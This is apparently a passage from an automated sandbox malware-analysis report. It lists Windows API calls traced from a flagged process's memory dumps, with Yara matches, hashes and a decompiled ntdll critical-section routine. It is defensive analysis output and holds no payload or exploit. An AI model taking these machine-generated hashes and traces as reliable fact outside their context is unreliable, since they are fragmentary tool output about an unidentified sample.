                                      • RtlAllocateHeap.NTDLL(01233536,?,01233CAF,01233CAF,?,01233536,?,?,?,?,?,00000000,00000000,?), ref: 012388DD
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 9d305314e54f226c101f0554a3f797b867c2427ac0832cc486c7d17ef0c1d2c5
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: 02E046B1210208ABDB14EF99CC44EA777ACEF88754F118558FE086B241C670F910CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0122CFC2,0122CFC2,?,00000000,?,?), ref: 01238A80
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 559eea013e97a052964535b4605084622c081ec259df6596f372953c51f23963
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: 8FE01AB16002086BDB10DF49CC84EE737ADAF89650F018154FA0867241C970E910CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,01227C83,?), ref: 0122D45B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 1e39a7dfad0cba014391f5e4f9b757d191df75e2471bc9af1caec5fdc882158f
                                      • Instruction ID: ac3ede0647ee48b4d08f5b6442da25cf4770516a634fb8fd70e91664fb2f42ca
                                      • Opcode Fuzzy Hash: 1e39a7dfad0cba014391f5e4f9b757d191df75e2471bc9af1caec5fdc882158f
                                      • Instruction Fuzzy Hash: 2AD05E956B838529F711EAF81D02F572B848B22A80F0A46A9E68DEA183D94CC0198236
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,01227C83,?), ref: 0122D45B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction ID: cb3949fcd52db40d41263f479d6f819a747d20cef63100e2dbc2c9b83388724b
                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction Fuzzy Hash: 3CD05E727603093AF610EAA89C02F663288AB55A40F494064FA48962C3D954E5008161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01229BB2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 16b38af5867c66ab1e7e91376a446ab78951f754c75f44e95e777516efec77ce
                                      • Instruction ID: 19000661dca39ecb8e58abd44e73962e86d03050274e449edc724a419a29c0bf
                                      • Opcode Fuzzy Hash: 16b38af5867c66ab1e7e91376a446ab78951f754c75f44e95e777516efec77ce
                                      • Instruction Fuzzy Hash: 5DC02B3DF4C26436DF50C2846C42B0CF700CBC8902F9900CDED2CD7181D8A30050C241
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                                      • Instruction ID: 36b5d60a8956d79581bb6e4806d44598e5eca9b425d0ae9a0c43ea53b9c5072f
                                      • Opcode Fuzzy Hash: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                                      • Instruction Fuzzy Hash: 6AB09B71D014C5C5D611D7614608B67795177D0751F56C053D1020751B4778C095F5B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01223B93), ref: 0123891D
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: b34ca87abdfd35ad9b3096aae483e43e2667321c0023c43430d5e21255cd8d86
                                      • Instruction ID: cb0a8d370e49c6c2ab7a01d06fd338434e541bb9219615c6c672a92585e4159d
                                      • Opcode Fuzzy Hash: b34ca87abdfd35ad9b3096aae483e43e2667321c0023c43430d5e21255cd8d86
                                      • Instruction Fuzzy Hash: 88A002BA16C018569D4175D53D065B5720C88C41A92014562E10D455010547615A4972
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 53%
                                      			E054AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                      				void* _t7;
                                      				intOrPtr _t9;
                                      				intOrPtr _t10;
                                      				intOrPtr* _t12;
                                      				intOrPtr* _t13;
                                      				intOrPtr _t14;
                                      				intOrPtr* _t15;
                                      
                                      				_t13 = __edx;
                                      				_push(_a4);
                                      				_t14 =  *[fs:0x18];
                                      				_t15 = _t12;
                                      				_t7 = E0545CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                      				_push(_t13);
                                      				E054A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                      				_t9 =  *_t15;
                                      				if(_t9 == 0xffffffff) {
                                      					_t10 = 0;
                                      				} else {
                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                      				}
                                      				_push(_t10);
                                      				_push(_t15);
                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                      				return E054A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                      			}











                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 054AFDFA
                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054AFE2B
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054AFE01
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                                      • Instruction ID: 6060d282b4100ad26dc00b8b2ecd5856ddc08c5b773f19d901459746b84be046
                                      • Opcode Fuzzy Hash: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                                      • Instruction Fuzzy Hash: 3BF0FC372442017FDB211A45DC49FB3BF6AEB54730F240316F628595D1E972F82096F4
                                      Uniqueness

                                      Uniqueness Score: -1.00%